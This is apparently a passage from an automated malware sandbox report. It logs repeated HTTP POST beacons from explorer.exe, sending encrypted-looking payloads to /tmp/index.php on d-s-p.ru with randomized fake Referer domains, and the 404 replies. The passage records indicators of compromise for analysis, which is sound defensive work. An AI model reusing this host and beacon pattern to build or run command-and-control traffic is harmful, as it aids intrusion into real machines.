                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                45192.168.2.45005258.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:18.701184034 CET281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://ddedgrkngjekmoj.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 198
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:18.701227903 CET198OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 21 6b 2c 90 f5 76 0b 75 2b 57 a6 af
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[!k,vu+WW5a}Hv,_viC)6G:BUf]N-xVM@*<"v]EV/=
                                                                                                                                                                                Dec 30, 2024 19:45:20.211200953 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:19 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                46192.168.2.45005358.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:20.223864079 CET280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://ypotdnyqkrcswq.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 260
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:20.223879099 CET260OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 26 6b 2c 90 f5 76 0b 75 60 4b b7 bc
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[&k,vu`K<sOzdIE9&hnCiKiG6?ez^PhEgYT IQPKqX?b^l!gZ4jjX-yVj}X
                                                                                                                                                                                Dec 30, 2024 19:45:21.698214054 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:21 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                47192.168.2.45005458.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:21.708884001 CET277OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://oywmgpnhuhb.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 133
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:21.708935022 CET133OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 27 6b 2c 90 f5 76 0b 75 56 25 de a0
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -['k,vuV%|FZ[ggPrl)[m9E_1
                                                                                                                                                                                Dec 30, 2024 19:45:23.176513910 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:22 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                48192.168.2.45005558.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:23.185098886 CET277OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://laowevegchj.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 233
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:23.185133934 CET233OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 24 6b 2c 90 f5 76 0b 75 5c 06 ec 9d
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[$k,vu\S1Xjr3Pr\+3 9kvD C"D_FYGT%dL2,@6pnA#(Y>.},~s6,;/
                                                                                                                                                                                Dec 30, 2024 19:45:24.672801971 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:24 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                49192.168.2.45005658.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:24.685197115 CET278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://dqncwrghqkte.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 156
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:24.685245037 CET156OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 25 6b 2c 90 f5 76 0b 75 47 33 ae b8
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[%k,vuG3b3[oF$n2N m~B1Xn?0:H^D5
                                                                                                                                                                                Dec 30, 2024 19:45:26.125819921 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:25 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                50192.168.2.45005758.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:26.473896027 CET279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://agvphbybllsas.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 225
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:26.473908901 CET225OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 3a 6b 2c 90 f5 76 0b 75 30 05 c7 a6
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[:k,vu0yv5%~ ouvARu],VDcX$U'`MG;~<Z8{%8yqZ>@X.9}N|sq.
                                                                                                                                                                                Dec 30, 2024 19:45:27.931920052 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:27 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                51192.168.2.45005858.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:27.944336891 CET277OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://mjrsolarxwh.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 211
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:27.944360018 CET211OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 3b 6b 2c 90 f5 76 0b 75 50 08 d2 9e
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[;k,vuPoPjBg)~<>U)>B<c$RY{C5UpZ95^dQ@6ICLr
                                                                                                                                                                                Dec 30, 2024 19:45:29.410043001 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:29 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                52192.168.2.45005958.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:29.430948973 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://njmhqmwqrarclhje.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 199
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:29.430984020 CET199OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 38 6b 2c 90 f5 76 0b 75 5f 01 d7 fb
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[8k,vu_MW~x?si/r?|'TZ|S9&qa]M:xja 9D`'8F48
                                                                                                                                                                                Dec 30, 2024 19:45:30.888448954 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:30 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
